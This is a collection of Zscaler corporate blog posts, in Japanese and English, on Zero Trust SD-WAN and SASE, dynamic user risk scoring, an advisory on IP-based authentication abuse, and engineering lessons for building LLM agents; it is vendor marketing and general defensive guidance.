人々が働く環境は急速に進化しており、ハイブリッド ワークはニュー ノーマルとなりました。従来のネットワーク アーキテクチャーは、ユーザーが決まった場所で働く静的なモデルを軸に設計されていました。しかし、デスクのホテリング、コワーキング スペース、モバイル ワーク、インターネット中心の接続などが登場した現在、拠点のあり方は様変わりしています。拠点の進化に伴い、拠点の接続に使用するネットワーク インフラストラクチャーも進化しなければなりません。今や一律のアプローチですべてに対応することは困難になっています。
従来のネットワークが招くリスクと複雑性
従来の接続モデルは極めてネットワーク中心であり、ユーザー、デバイス、サーバーはネットワークに接続し、このネットワークを通じて同一ネットワーク上のすべてのデバイスにアクセスできます。このモデルには過剰な暗黙の信頼が存在し、どのデバイスもデフォルトで他のデバイスやサーバーと通信できるため、脅威のラテラル ムーブメントやランサムウェアなどの攻撃が可能になります。
また、ネットワーク中心の接続ではVPNトンネルを使用してネットワークをパブリック クラウドやサードパーティーに拡張する必要があり、直接制御できないインフラストラクチャーに攻撃対象領域が拡大する可能性があります。組織でIoTデバイスの利用が拡大するに伴い、攻撃対象領域の管理はますます複雑になっています。また、ルーティングされたオーバーレイや従来型のルーティング プロトコルへの依存は、ネットワークのさらなる複雑化を招きます。
従来のSD-WANはゼロトラストではない
SD-WANもネットワーク中心のアプローチをとり、サイト間VPNトンネルとルーティング プロトコルを使用してルーティングされたオーバーレイを構築します。これによって高価なMPLSネットワークから脱却し、多くの運用上の課題を解決できるものの、ラテラル ムーブメントを助長してセキュリティ上のリスクを招きます。こうしたリスクを制御するにはネットワークベースのセグメンテーションを行わなければならず、多くの場合、拠点のファイアウォール アプライアンスの追加やネットワークベースの複雑なセキュリティ ポリシーが必要になります。
そこで役立つのがゼロトラストです。これは、デフォルトではすべてのエンティティーを信頼できないものとみなし、アイデンティティー、コンテキスト、ポスチャーに基づいて特定のリソースへのアクセスのみを許可するサイバーセキュリティ戦略です。従来のネットワークの仕組みとは根本的に逆の発想に基づいています。セグメンテーションやアドミッション制御などの手法でも、従来のネットワークにつきものの信頼を制限することは可能ですが、こうしたアプローチでは複雑性が大幅に増す可能性があります。
今求められているのは、ゼロトラストの原則に基づく新たなアプローチなのです。
Zero Trust SD-WANの発表
Zscalerは先日、Zero Trust Exchangeを介して拠点を接続するためのアプライアンス「Branch Connector」を発表しました。本日は、従来のSD-WANによるセキュリティ リスクを排除し、拠点、工場、病院、小売店、データ センターを安全に接続する業界初のゼロトラスト ソリューション「Zero Trust SD-WAN」を発表します。Zero Trust SD-WANは、軽量の仮想マシンまたはプラグ&プレイ アプライアンスとZscaler Zero Trust Exchangeを組み合わせ、インバウンドおよびアウトバウンドの安全なゼロトラスト ネットワークを各ロケーションに提供します。オーバーレイ ルーティングや追加のファイアウォール アプライアンスを必要とせず、一貫性のないポリシーを生むこともありません。業界をリードするZscalerのSSEプラットフォームと完全に統合されており、強固なセキュリティを実現するとともに、拠点のネットワーク管理を簡素化します。
また、プラグ&プレイ アプライアンスのZ-Connectorとして、ZT 400、ZT 600、ZT 800を発表します。軽量の仮想マシンとしても利用可能です。これらのアプライアンスは、200 Mbpsからマルチギガビットまで、幅広いお客様の要件に対応します。事前にプロビジョニングされた構成テンプレートとゼロ タッチ プロビジョニングにより、新たな拠点の展開を、インターネットに接続するだけで簡単に行えます。
新登場のゲートウェイ機能
Zero Trust SD-WANは、フォワーダーまたはゲートウェイの2種類のモードで展開できます。既にWANソリューションを使用しているお客様は、フォワーダー モードでゼロトラスト オーバーレイを実装できます。Z-Connectorアプライアンスは、既存のルーターおよびスイッチに隣接する形で展開します。関連するトラフィックは、条件付きDNS解決またはポリシーベースのルーティングによってZ-Connectorアプライアンスに転送できます。
ゲートウェイ モードでは、Z-ConnectorアプライアンスでISP接続を直接終端するため、ルーターやファイアウォールを追加する必要はありません。Z-Connectorはサイトのデフォルト ゲートウェイとして機能し、すべてのトラフィックをZscaler Zero Trust Exchangeに転送して、インターネット、SaaS、プライベート アプリケーションへの安全な接続を提供します。
ゲートウェイ モードは、デュアルISP終端、ISP監視によるアプリ認識型のパス選択、高可用性(アクティブ/アクティブ、アクティブ/パッシブ)、複数のLANサブネット、ローカル ファイアウォール、統合DHCPサーバー、DNSゲートウェイなど、さまざまなWANおよびLAN管理機能をサポートしています。
Zero Trust SD-WANのゲートウェイ機能の提供開始は2024年2月を予定しています。
Zero Trust SD-WANによって複雑性とリスクを低減
ゼロトラストSD-WANはお客様の多くの重要課題を解決します。主なユース ケースは以下のとおりです。
サイト間VPNの代替:複雑なVPN構成とルート テーブル管理を回避し、脅威のラテラル ムーブメントのリスクを排除する。
M&Aに伴う統合の加速:ルーティング ドメインを統合したりNATゲートウェイを導入したりすることなくユーザーを組織全体のアプリに接続し、統合に要する時間を数か月から数日に短縮する。
セキュアなOT接続:ベンダーがOTリソースにリモート アクセスするためのVPNや露出したポートを排除する。
IoTの検出と分類:AI活用型の分類エンジンでネットワーク上のIoTデバイスを検出して保護する。
上記のユース ケースの詳細については、ゼロトラストの拠点への拡張に関するブログをご確認ください。
ゼロトラストを基盤とした業界初のSASEプラットフォーム
セキュア アクセス サービス エッジ(SASE)とは、Gartnerが提唱した言葉で、最新のITインフラストラクチャーや働き方に対応するためのネットワークとセキュリティの集合体を指しています。SASEはゼロトラストの原則を取り入れているものの、市場に出回っている多くのSASEソリューションは、SSEサービスに従来のSD-WANを付け加えただけのもので、ゼロトラストの原則が適用されるのはユーザーからアプリへのアクセスだけに限られます。結果として、サイトは過剰な暗黙の信頼によるリスクを抱えることになります。
Zero Trust SD-WANのリリースによって、ZscalerはゼロトラストとAIを基盤とした業界初のシングル ベンダーSASEプラットフォームを提供できることになりました。Zero Trust SASEにより、ゼロトラストをユーザーだけでなく拠点、工場、データ センターにまで拡張することができます。Zero Trust SASEは、SSEプラットフォームであるZero Trust Exchangeの強みを基盤に構成されており、従来のセキュリティ ソリューションやネットワーク ソリューションを排除してコストや複雑性を低減します。
拠点のネットワークの変革が必要
従来のWANアーキテクチャーはもはや機能していません。ハイブリッド ワークやゼロトラスト セキュリティを中心とした創造的破壊により、ネットワーク アーキテクチャーを再考、変革するまたとない機会が生まれています。Zero Trust SD-WANとZero Trust SASEは、従来とは根本的に異なるアプローチを採用し、脅威のラテラル ムーブメントのリスクを招くことなくユーザー、デバイス、アプリを接続します。
製品についてのより詳しい情報、ホワイト ペーパー、動画は、SASEのリソース ページでご紹介しています。また、Zero Trust SD-WANの詳細はこちらでご確認いただけます。
Mon, 22 1月 2024 17:50:01 -0800Naresh Kumarhttps://www.zscaler.jp/blogs/product-insights/introducing-zero-trust-saseHow Zscaler’s Dynamic User Risk Scoring Works
https://www.zscaler.jp/blogs/product-insights/how-zscaler-s-dynamic-user-risk-scoring-works
Access control policies aim to balance security and end user productivity, yet often fall short due to their static nature and limited ability to adapt to evolving threats. But what if there was an easy way to automate access control per user, considering individual risk factors and staying up-to-date with the latest advanced attacks?
Zscaler User Risk Scoring takes dynamic access control and risk visibility to the next level using records of previous behavior to determine future risk.
Similar to how insurance companies use driving records to determine car insurance rates, or banks use credit scores to assess loan eligibility, user risk scoring leverages previous behavior records to assign risk scores to individual users. This allows organizations to set dynamic access control policies based on various risk factors, accounting for the latest threat intelligence.
User risk scoring empowers organizations to restrict access to sensitive applications for users with a high risk score until their risk profile improves. By considering factors such as past victimization by cyberattacks, near-misses with malicious content, or engagement in behavior that could lead to a breach, organizations can ensure that access control policies are tailored to individual risk profiles.
Organizations can set user risk thresholds to allow or deny access to both private and public application
How does user risk scoring work?
User risk scoring plays a crucial role across the Zscaler platform, driving policies for URL filtering, firewall rules, data loss prevention (DLP), browser isolation, and Zscaler Private Access (ZPA); and feeding into overall risk visibility in Zscaler Risk360. By leveraging user risk scores within each of these security controls, organizations can better protect all incoming and outgoing traffic from potential threats.
URL filtering rules are one way that risk scoring can be applied to policies within Zscaler Internet Access (ZIA)
The risk scoring process consists of two components: the static (baseline) risk score and the real-time risk score. The static risk score is established based on a one-week lookback at risky behavior and is updated every 24 hours. The real-time risk score modifies this baseline every 2 minutes throughout the day, updating whenever a user interacts with known or suspected malicious content. Each day at midnight, the real-time risk score is reset.
Zscaler considers more than 65 indicators that influence the overall risk score. These indicators fall into three major categories: pre-infection behavior, post-infection behavior, and more general suspicious behavior. The model accounts for the fact that not all incidents are equal; each indicator has a variable contribution to the risk score based on the severity and frequency of the associated threat.
Pre-infection behavior indicators encompass a range of blocked actions that would have led to user infection, such as blocked malware, known and suspected malicious URLs, phishing sites, pages with browser exploits, and more.
Post-infection behavior indicators include things like detected botnet traffic or command-and-control traffic, which show that a user/device has already been compromised.
Suspicious behavior indicators are similar to pre-infection indicators but are less severe (and less guaranteed to lead to infection), covering policy violations and risky activities like browsing deny-listed URLs, DLP compliance violations, anonymizing sites, and more.
*A more detailed sampling of these indicators is included at the bottom of this article.
How can Zscaler customers use risk scoring?
User risk scores can be found in the the analytics and policy administration menus of both Zscaler Internet Access (ZIA) and Zscaler Private Access (ZPA). They are also woven together with a range of additional inputs in Zscaler Risk360, which allows security teams to delve deeper into their organization’s holistic risk.
Organizations can monitor risk scores for individuals and for the overall organization
Zscaler also has deep integrations with many leading security operations tools, allowing the same telemetry and incident alert context that feeds into risk scoring to be shared with tools like SIEM, SOAR, and XDR via a REST API to streamline workflows.
These scores can be used to:
Drive access control policies
User risk scoring gives network and security teams a powerful tool to use to drive low-maintenance zero trust access control policies, controlling both incoming and outgoing internet and application traffic. It can be combined with other dynamic rulesets (e.g., device posture profiles) and static rulesets (e.g., URL and DNS filtering and app control policy) to protect organizations from breaches without unnecessarily restricting user productivity.
User risk, device posture, and other access policies work together seamlessly to optimize secure access
Monitor overall organizational risk and key factors that can be improved
Admins can monitor their company risk over time to assess the top areas of overall company risk and prioritize remediation efforts. They can see how risk scores are distributed across users and locations, and can benchmark their risk score against other companies in their industry.
Company risk scores can be analyzed over time against industry benchmarks
Monitor risky users on an individual basis and understand how (and why) their risk is trending
If a user’s risk score spikes, admins can take action, whether that be isolating that user’s machine to deal with an active threat, or simply training a user that certain behaviors are posing an unacceptable risk.
Admins can analyze individual users and double-click into specific incidents
Overall, Zscaler User Risk Scoring, with its categorization of threats and aggregation of logs, offers valuable insights into an organization's security posture. By understanding the different types of risks and behaviors associated with cyberthreats, organizations can implement dynamic access control policies and proactively protect their critical assets and data. With risk scoring, organizations can navigate the ever-changing threat landscape with confidence.
To learn about more of Zscaler’s unique inline security capabilities, check out our Cyberthreat Protection page.
Sample Indicators for User Risk Scoring
· Pre-infection behavior includes a range of blocked actions that would have likely led a user to be infected, such as:
o Malware blocked by Zscaler’s Advanced Threat Protection or inline Sandbox
o Blocked known and suspected malicious URLs
o Blocked websites with known and suspected phishing content
o Blocked pages with known browser exploits
o Blocked known and suspected adware and spyware
o Blocked pages with a high PageRisk score
o Quarantined pages
o Blocked files with known vulnerabilities
o Blocked emails containing viruses
o Detected mobile app vulnerabilities
· Post-infection behavior includes a range of blocked actions that were attempted after a user was infected, such as:
o Botnet traffic
o Command-and-control traffic
· Suspicious behavior includes policy violations and other risky sites, files, and conditions that could lead to infection, such as:
o Deny-listed URLs
o DLP compliance violations
o Pages with known dangerous ActiveX controls
o Pages vulnerable to cross-site scripting attacks
o Possible browser cookie theft
o Internet Relay Chat (IRC) tunneling use
o Anonymizing sites
o Blocks or warnings from secure browsing about an outdated/disallowed component
o Peer-to-peer (P2P) site denials
o Webspam sites
o Attempts to browse blocked URL categories
o Mobile app issues included denial of the mobile app, insecure user credentials, location information leaks, personally identifiable information (PII), information identifying the device, or communication with unknown servers
o Tunnel blocks
o Fake proxy authentication
o SMTP (email) issues including rejected password-encrypted attachments, unscannable attachments, detected or suspected spam, rejected recipients, DLP blocks or quarantines, or blocked attachments
o IPS blocks of cryptomining & blockchain traffic
o Reputation-based blocks of suspected adware/spyware sites
o Disallowed use of a DNS-over-HTTPS sit
Fri, 19 1月 2024 05:00:01 -0800Mark Brozekhttps://www.zscaler.jp/blogs/product-insights/how-zscaler-s-dynamic-user-risk-scoring-worksThreatLabz Security Advisory: Rise in Source IP-Based Authentication Abuse - Jan 19, 2024
https://www.zscaler.jp/blogs/security-research/threatlabz-security-advisory-rise-source-ip-based-authentication-abuse-jan
Introduction
The Zscaler ThreatLabz team is seeing an increase in attacks that abuse IP-based authentication and target global organizations. Attackers are actively exploiting the limitations and weaknesses of IP-based authentication methods, posing a significant challenge for organizations. Successful attacks can lead to unauthorized system access, data breaches, and the potential compromise of critical assets.
In this advisory, we share information about risk exposure and best practices for organizations to defend against these attacks.
Key Takeaways
Zscaler ThreatLabz has observed an increase in source IP-based authentication abuse leveraging system compromise, identity compromise, and shadow IT environments, to name a few examples.
Employing a Zero Trust architecture, along with other security best practices, in managing your identities and multi-factor authentication (MFA) configuration is paramount to establishing a robust security posture and effectively mitigating the risks associated with unauthorized access and data breaches.
Further mitigate IP-based authentication vulnerabilities by implementing an identity provider (IdP) with FIDO2-based MFA and reinforcing user account reset processes.
Background
Organizations employ various methods to restrict access to sensitive data and systems. Source IP-based authentication is a commonly used method that provides a straightforward and quick way to control access. However, if IP-based authentication is one of the primary authentication mechanisms, it also introduces additional risk factors. IP-based authentication can:
Be difficult to scale as the organization grows in size and complexity.
Prevent the implementation of granular access controls.
Reduce the sophistication and level of effort that threat actors must leverage to access organizational assets.
Introduce challenges in auditing access and activity.
Examples Of IP-Based Authentication Abuse
Threat actors use many methods to bypass source IP-based authentication. The following examples describe recently observed common attack vectors:
System compromise: Compromising local system credentials or installing malware gives an attacker access to a system that can be allowlisted to multiple sensitive systems.
Wi-Fi networks: By relying on source IP-based authentication, organizations are at a higher risk of unauthorized access due to vulnerabilities or misconfigurations in wireless networks.
Identity compromise: Identity compromise can occur when threat actors use social engineering to manipulate help desk personnel, posing as legitimate users. Through this deception, they aim to gain initial access. Once inside, a threat actor can exploit the limitations of IP-based authentication, allowing them to move laterally within the system.
Physical access: When a threat actor gains physical access to an office or data center, they are free to access sensitive systems because they now have an authorized IP address.
Misconfiguration: Source IP-based authentication relies on accurate network definitions, and it is easy to introduce risk by exposing sensitive systems to uncontrolled IP spaces.
Shadow IT: Unmanaged shadow IT environments are common and introduce additional risk because IP-based authentication might not discern between managed and unmanaged environments.
Best Practices To Safeguard Against These Attacks
Although source IP filtering can serve as an additional layer of security, it should NOT be relied upon for authentication. By implementing the following measures and best practices, organizations can safeguard their sensitive systems and data, as well as identify and bolster the efficacy of their environments.
1. Move all crown-jewel applications behind Zero Trust solutions
Move all crown-jewel applications behind Zero Trust solutions such as Zscaler Private Access™ (ZPA™), and prioritize user-app segmentation for sensitive applications to proactively defend against these attacks. Zero Trust solutions can help you:
Deploy role-based access controls, providing granular access based on the user’s role to prevent access to unnecessary systems and limit risk.
Enforce posture control to ensure that only approved systems with a full endpoint security stack can communicate with sensitive applications.
Establish strong Data Loss Prevention (DLP) policies to control access and prevent exfiltration of sensitive information.
The key principles of a Zero Trust architecture ensure that you never trust and always verify. Organizations that implement a Zero Trust solution like Zscaler are able to:
Minimize the attack surface by making internal apps invisible to the internet.
Prevent compromise by using cloud-native proxy architecture to inspect all traffic inline and at scale, enforcing consistent security policies.
Stop lateral movement by connecting authorized users to applications rather than connecting networks to applications, which reduces the attack surface through strong posture check and workload segmentation.
Stop data loss by inspecting all internet-bound traffic, including encrypted channels, to prevent data theft.
Identify threats by leveraging deception technologies to stop attacks before an attacker’s objectives are accomplished.
2. Use an IdP with FIDO2-based MFA
Using an IdP with FIDO2-based MFA for authentication offers numerous advantages over relying solely on local accounts. IdPs provide centralized control and management of your administrator identities, which streamlines the authentication process and ensures consistency across applications and services. It also:
Simplifies user access management, which saves time and reduces mistakes.
Enables the implementation of single sign-on (SSO), allowing users to authenticate once and access applications securely, thus enhancing the user experience and eliminating the risk of weak or reused passwords.
Offers additional security features such as MFA and adaptive authentication, which provide additional defenses against unauthorized access.
3. Strengthen processes around user account resets
Strengthen processes around user account resets by training help desk personnel to perform strong user identity validation. You can:
Leverage corporate directory contact information to perform callbacks that ensure user identities before resetting access.
Require managers to personally validate identities when standard validation techniques are not possible.
Conclusion
The Zscaler ThreatLabz and Product Security teams continuously monitor threat trends and share their findings with customers and the wider community. If you have any questions, please reach out using the official support channel.
Fri, 19 1月 2024 08:00:01 -0800Dhaval Parekhhttps://www.zscaler.jp/blogs/security-research/threatlabz-security-advisory-rise-source-ip-based-authentication-abuse-jan今求められるゼロトラストのSASE
https://www.zscaler.jp/blogs/product-insights/zero-trust-sase
人々が働く環境は決定的に変化しました。最近のGallupの調査によると、米国の組織では従業員の50%がハイブリッド モデルで働いており、完全なオンサイト勤務の割合はわずか20%となっています。また、Gartnerの予測分析では、2023年末までに世界のナレッジ ワーカーの約40%でハイブリッド ワークが標準になると見込まれていました。
拠点のあり方も以前とは様変わりしており、カフェのようなオフィスへの移行を進める組織が増えています。クラウドやSaaSへの移行と相まって、ITインフラストラクチャーの根本的な変化が進んでいます。このニュー ノーマルに対応するには、ネットワークの設計、構築、保護の方法にも進化が必要です。
一律の対応は困難
ユーザーやアプリがあらゆる場所に分散するようになった今、ネットワークを中心とした従来の接続モデルやセキュリティ モデルはさまざまな課題を抱えています。ネットワーク環境は曖昧さや複雑さを増しており、ファイアウォールやVPNをベースとした従来のセキュリティを無理に適用しようとすることで、コスト、複雑性、リスクの増加につながっています。ファイアウォールへの投資の増加をよそにサイバー攻撃は増え続けており、ランサムウェアなどの脅威はますます拡大しています。Zscaler ThreatLabzの調査では、ランサムウェア攻撃は2022年から2023年にかけて約40%増加し、要求額の平均は530万ドルでした。
現在のネットワーク技術は、ITシステムの相互通信ができなかった30年前の問題を解決するために設計されたものです。世界中のユーザーとコンピューティング システム間の接続性やアクセス性を最大化するために、現在のようなネットワーク スタックに行き着いたのも当然と言えます。
もたらされた生産性とビジネス上の価値は計り知れませんが、これにはサイバー リスクという代償も伴ってきました。攻撃者は組織内のどこか1か所に侵入経路を見つければ、そこからネットワーク内を移動して価値の高い重要なアプリケーションやデータにアクセスできます。攻撃対象領域は拠点、小売店、クラウド、リモート ユーザー、パートナーにまで広がり、従来のネットワーク インフラストラクチャーの保護には複雑でコストのかかる作業が必要です。
ゼロトラストによるネットワークの創造的破壊
ゼロトラストは、ネットワークからエンティティー(ユーザー、デバイス、アプリ、サービス)に焦点を移すサイバーセキュリティ戦略です。デフォルトでは一切のエンティティーを信頼せず、アイデンティティー、コンテキスト、セキュリティ態勢に基づいて特定のリソースへのアクセスのみを明示的に許可します。また、新たな接続のたびに信頼性を絶えず評価し直します。
従来のネットワークには暗黙の信頼が存在し、ひとたび接続すればネットワーク内を自由に移動でき、あらゆるエンティティーと通信できるため、ゼロトラスト モデルには適していません。ネットワーク アーキテクトは、ネットワークのセグメント化によって信頼の程度やラテラル ムーブメントの範囲を制限できますが、この方法は複雑で管理が困難です。高速道路網を構築し、すべてのランプやインターチェンジに検問所を設けるようなものです。
ゼロトラスト ネットワークは、組織のネットワーク構築のあり方の根本的な見直しを可能にしてくれます。まず必要なのは、完全に信頼されたオーバーレイ ルーティングではなく、ゼロトラストの基盤です。各エンティティーをある種の交換機に接続して、コンテキストとセキュリティ態勢に基づき、必要に応じて接続を仲介するのです。
図:ゼロトラスト アーキテクチャー
従来のSD-WANはゼロトラストではない
従来のSD-WANは、高価なMPLS WANサービスに代わる選択肢として、10年以上前に登場したものです。複数のISP接続とアクティブなパス モニタリングによって、SD-WANはインターネット接続の全体的な信頼性とパフォーマンスを大幅に向上させ、ミッションクリティカルなアプリをインターネット経由で安心して利用できるようになりました。
それから10年の時間とコロナ禍を経た今、インターネットが組織のアプリを利用するのに十分な速度と信頼性を備えていることは、証明するまでもありません。ギガビット ファイバー接続を手軽に利用でき、ほとんどのSaaSアプリはインターネット経由での利用に向けて最適化されています。今、SD-WANに求められているのは異なる問題の解決です。自宅でもオフィスでも一貫したユーザー エクスペリエンスやセキュリティの提供、IoTデバイスのトラフィックの保護、ゼロトラスト セキュリティのすべての拠点への拡張などを、ファイアウォールやVPNアプライアンスを追加することなく実現することが求められています。
セキュア アクセス サービス エッジ(SASE)
「SASE」は2019年にGartnerが定義した言葉で、現代のトラフィックの流れにいっそう適した共通のクラウド ネイティブ プラットフォームから提供される、ネットワークとセキュリティの集合体を指しています。SASEは、FWaaS、SWG、CASB、DLPなどのセキュリティ サービスと、ZTNAやSD-WANなどの接続サービスが融合したクラウド提供型のサービスとして広く理解されています。
SASEへの移行は、セキュリティ サービスをクラウド規模でゼロから考え直し、再構築することを意味します。しかし、多くのSASEソリューションは、ファイアウォール/VPNモデルをクラウドに拡張し、従来のセキュリティ アプライアンスをホスティングで提供するだけのものです。このようなソリューションにおいてSD-WAN統合は後付けに過ぎず、ゼロトラストをユーザー以外に拡張することはできません。
Zscalerのソリューション
Zscalerはリモート ユーザー向けゼロトラスト セキュリティのパイオニアであり、使い勝手の悪いリモート アクセスVPNを排除して、世界中で数千の組織のサイバー リスク軽減を実現しています。業界をリードするAI活用型のSSEプラットフォームを構築し、Gartner Magic Quadrant for SSEで、2年連続でリーダーの1社と評価されました。
このたびZscalerでは、同じゼロトラスト セキュリティを拠点、工場、小売店、データ センターに提供するためのテクノロジーをリリースします。1月23日のイベントで、業界初のSD-WANイノベーションを発表します。ゼロトラストのAIを基盤に構築したゼロトラストのSASEプラットフォームにより、セキュリティやネットワーク アーキテクチャーの刷新を実現します。変革に向けた取り組みの実例や、Zscalerを利用するメリットについて、実際のお客様の声もご紹介します(このイベントは終了しました。ご紹介した内容はこちらからご確認いただけます)。
Tue, 16 1月 2024 16:39:35 -0800Ameet Naikhttps://www.zscaler.jp/blogs/product-insights/zero-trust-saseThe Mythical LLM-Month
https://www.zscaler.jp/blogs/product-insights/mythical-llm-month
It’s clear: 2023 was the year of AI. Beginning with the release of ChatGPT, it was a technological revolution. What began as interacting agents quickly started moving to indexing documents (RAG), and now, indexing documents, connecting to data sources, and enabling data analysis with a simple sentence.
With the success of ChatGPT, a lot of people promised last year to deliver large language models (LLMs) soon … and very few of those promises have been fulfilled. Some of the important reasons for that are:
We are building AI agents, not LLMs
People are treating the problem as a research problem, not an engineering problem
Bad data
In this blog, we’ll examine the role of AI agents as a way to link LLMs with backend systems. Then, we'll look at how the use of intuitive, interactive semantics to comprehend user intent is setting up AI agents as the next generation of user interface and user experience (UI/UX). Finally, with upcoming AI agents in software, we’ll talk about why we need to bring back some principles of software engineering that people seem to have forgotten in the past few months.
I Want a Pizza in 20 Minutes
LLMs offer a more intuitive, streamlined approach to UI/UX interactions compared to traditional point-and-click methods. To illustrate this, suppose you want to order a “gourmet margherita pizza delivered in 20 minutes” through a food delivery app.
This seemingly straightforward request can trigger a series of complex interactions in the app, potentially spanning several minutes of interactions using normal UI/UX. For example, you would probably have to choose the "Pizza" category, search for a restaurant with appetizing pictures, check if they have margherita pizza, and then find out whether they can deliver quickly enough—as well as backtrack if any of your criteria aren’t met. This flowchart expresses the interaction with the app.
We Need More than LLMs
LLMs are AI models trained on vast amounts of textual data, enabling them to understand and generate remarkably accurate human-like language. Models such as OpenAI's GPT-3 have demonstrated exceptional abilities in natural language processing, text completion, and even generating coherent and contextually relevant responses.
Although more recent LLMs can do data analysis, summary, and representation, the ability to connect external data sources, algorithms, and specialized interfaces to an LLM gives it even more flexibility. This can enable it to perform tasks that involve analysis of domain-specific real-time data, as well as open the door to tasks not yet possible with today’s LLMs.
This “pizza” example illustrates the complexity of natural language processing (NLP) techniques. Even this relatively simple request necessitates connecting with multiple backend systems, such as databases of restaurants, inventory management systems, delivery tracking systems, and more. Each of these connections contributes to the successful execution of the order.
Furthermore, the connections required may vary depending on the request. The more flexibility you want the system to understand and recognize, the more connections to different backend systems will need to be made. This flexibility and adaptability in establishing connections is crucial to accommodate diverse customer requests and ensure a seamless experience
AI Agents
LLMs serve as the foundation for AI agents. To respond to a diverse range of queries, an AI agent leverages an LLM in conjunction with several integral auxiliary components:
The agent core uses the LLM and orchestrates the agent's overall functionality.
The memory module enables the agent to make context-aware decisions.
The planner formulates the agent’s course of action based on the tools at hand.
Various tools and resources support specific domains, enabling the AI agent to effectively process data, reason, and generate appropriate responses. The set of tools include data sources, algorithms, and visualizations (or UI interactions).
Agent core
The agent core is the “brain” of the AI agent, managing decision-making, communication, and coordination of modules and subsystems to help the agent operate seamlessly and interact efficiently with its environment or tasks.
The agent core receives inputs, processes them, and generates actions or responses. It also maintains a representation of the agent's knowledge, beliefs, and intentions to guide its reasoning and behavior. Finally, the core oversees the update and retrieval of information from the agent's memory to help it make relevant, context-based decisions
Memory
The memory module encompasses history memory and context memory components, which store and manage data the AI agent can use to simultaneously apply past experiences and current context to inform its decision-making.
History memory stores records of previous inputs, outputs, and outcomes. These records let the agent learn from past interactions and gain insights into effective strategies and patterns that help it make better-informed decisions and avoid repeating mistakes.
Context memory, meanwhile, enables the agent to interpret and respond appropriately to the specific, current circumstances using information about the environment, the user's preferences or intentions, and many other contextual factors
Planner
The planner component analyzes the state of the agent’s environment, constraints, and factors such as goals, objectives, resources, rules, and dependencies to determine the most effective steps to achieve the desired outcome.
Here’s an example of a prompt template the planner could use, according to Nvidia:
GENERAL INSTRUCTIONS
You are a domain expert. Your task is to break down a complex question into simpler sub-parts. If you cannot answer the question, request a helper or use a tool. Fill with Nil where no tool or helper is required.
AVAILABLE TOOLS
- Search Tool
- Math Tool
CONTEXTUAL INFORMATION
<information from Memory to help LLM to figure out the context around question>
USER QUESTION
“How to order a margherita pizza in 20 min in my app?”
ANSWER FORMAT
{"sub-questions":["<FILL>"]}
Using this, the planner could generate a plan to serve as a roadmap for the agent's actions, enabling it to navigate complex problems and strategically accomplish its goals
Tools
Various other tools help the AI agent perform specific tasks or functions. For example:
Retrieval-augmented generation (RAG) tools enable the agent to retrieve and use knowledge base content to generate coherent, contextually appropriate responses.
Database connections allow the AI agent to query and retrieve relevant information from structured data sources to inform decisions or responses.
Natural language processing (NLP) libraries offer text tokenization, named entity recognition, sentiment analysis, language modeling, and other functionality.
Machine learning (ML) frameworks enable the agent to leverage ML techniques such as supervised, unsupervised, or reinforcement learning to enhance its capabilities.
Visualization tools help the agent represent and interpret data or outputs visually, and can help the agent understand and analyze patterns, relationships, or trends in the data.
Simulation environments provide a virtual environment where the agent can sharpen its skills, test strategies, and evaluate potential outcomes without affecting the real world.
Monitoring and logging frameworks facilitate the tracking and recording of agent activities, performance metrics, or system events to help evaluate the agent's behavior, identify potential issues or anomalies, and support debugging and analysis.
Data preprocessing tools use techniques like data cleaning, normalization, feature selection, and dimensionality reduction to ensure raw data is relevant and high-quality before the agent ingests it.
Evaluation frameworks provide methodologies and metrics that enable the agent to measure its successes, compare approaches, and iterate on its capabilities.
These and other tools empower AI agents with functionality and resources to perform specific tasks, process data, make informed decisions, and enhance their overall capabilities
Adding LLM-based Intelligent Agents to Your Data Is an Engineering Problem, Not a Research Problem
People realized that natural language can make it much easier and forgiving (not to say relaxed) to specify use cases required for software development. Because the English language can be ambiguous and imprecise, this is leading to a new problem in software development, where systems are not well specified or understood.
Fred Brooks outlined many central software engineering principles in his 1975 book The Mythical Man-Month, some of which people seem to have forgotten during the LLM rush. For instance:
No silver bullet. This is the first principle people have forgotten with LLMs. They believe LLMs are the silver bullet that will eliminate the need for proper software engineering practices.
The second-system effect. LLM-based systems are being considered a second system because people treat LLMs as so powerful that they can forget LLM limitations.
The tendency toward an irreducible number of errors. Even if you get the LLM implementation correct, LLMs can hallucinate or even expose additional errors that have been hidden because of lack of a way to exercise the backend in ways we have not been able to in the past.
Progress tracking. I remember the first thing I heard from Brooks’ book was, “How does a project get to be a year late? One day at a time.” I have seen people assuming that if they sweep problems under the rug they will disappear. Machine learning models, and LLMs in particular, inherit the same problems of ill-designed systems with the addition of amplification of bad data, which we will describe later.
Conceptual integrity. This problem has shifted from designing the use cases (or user stories) so that they show the conceptual integrity of the entire system to saying the LLM will bind any inconsistencies in the software magically. For example, if you want to have a user story that solves the order of a food app “I want to order a gourmet margherita pizza in 20 min”, by changing the question to:
Can I get a gourmet margherita pizza delivered in 20 minutes?
Show me all pizza places that can deliver a gourmet margherita pizza in 20 minutes.
Show me all pizza places that can deliver a gourmet margherita pizza in 20 minutes ranked by user preference.
We can easily see that different types of data, algorithms, and visualizations are required to address this problem.
The manual and formal documents. Thanks to hype, this is probably the most forgotten principle in the age of LLMs. It’s not enough to say “develop a system that will tell me how to order things like a gourmet margherita pizza in 20 minutes.” This requires documentation of a whole array of other use cases, required backend systems, new types of visualizations to be created, and—crucially—specifications of what the system will not do. “Things like” seems to have become a norm in LLM software development, as if an LLM can magically connect to backend systems and visualize data it has never learned to understand.
The pilot system. Because of these limitations, software systems with LLM based intelligent agents have not left the pilot stage in several companies simply because they are not able to reason beyond simple questions used as “example of use cases.”
In a recent paper, we addressed the first issue of lack of proper specification of software systems, and showed a way we can create formal specifications for LLM-based intelligent systems, in a way that they can follow sound software engineering principles
Bad Data
In a recent post on LinkedIn, we described the importance of “librarians” to LLM-based intelligent agents. (Apparently, this post was misunderstood, as several teachers and actual librarians liked the post.) We were referring to the need to use more formal data organization and writing methodologies to ensure LLM-based intelligent agents work.
The cloud fulfilled its promise of not requiring us to delete data, just letting us store it. With this came the pressure to quickly create user documentation. This created a “data dump,” where old data lives with new data, where old specifications that were never implemented are still alive, where outdated descriptions of system functionalities persist, having never been updated in the documentation. Finally, documents seem to have forgotten what a “topic sentence” is.
LLM-based systems expect documentation to have well-written text, as recently shown when OpenAI stated that it is “impossible” to train AI without using copyrighted works. This alludes not only to the fact that we need a tremendous amount of text to train these models, but also that good quality text is required.
This becomes even more important if you use RAG-based technologies. In RAG, we index document chunks (for example, using embedding technologies in vector databases), and whenever a user asks a question, we return the top ranking documents to a generator LLM that in turn composes the answer. Needless to say, RAG technology requires well-written indexed text to generate the answers.
